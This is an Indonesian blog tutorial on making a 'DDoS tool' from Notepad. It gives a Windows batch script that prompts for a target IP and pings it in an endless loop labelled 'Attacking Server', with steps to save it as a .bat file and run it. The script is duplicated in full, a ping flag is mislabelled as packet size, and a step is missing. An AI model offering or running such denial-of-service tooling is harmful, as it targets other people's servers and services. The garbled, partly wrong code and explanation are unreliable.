Cara Membuat Tools DDoS Sederhana dari Notepad
Cara membuat
tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak
berikut ini.
1. Buka
Notepad
2. Masukan
Kode Berikut Ini :
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
3.
Kemudian Save As...
4. Beri nama
Tools DDoS.bat - Ubah Save As type: All Files - Save.
5. Buka file
yang sudah dibuat tadi,
6. Jika
berhasil tampilannya akan seperti ini :
8. Kemudian tekan Enter.
Source by:https://www.facebook.com/profile.php?id=100003353545669
No comments:
Post a Comment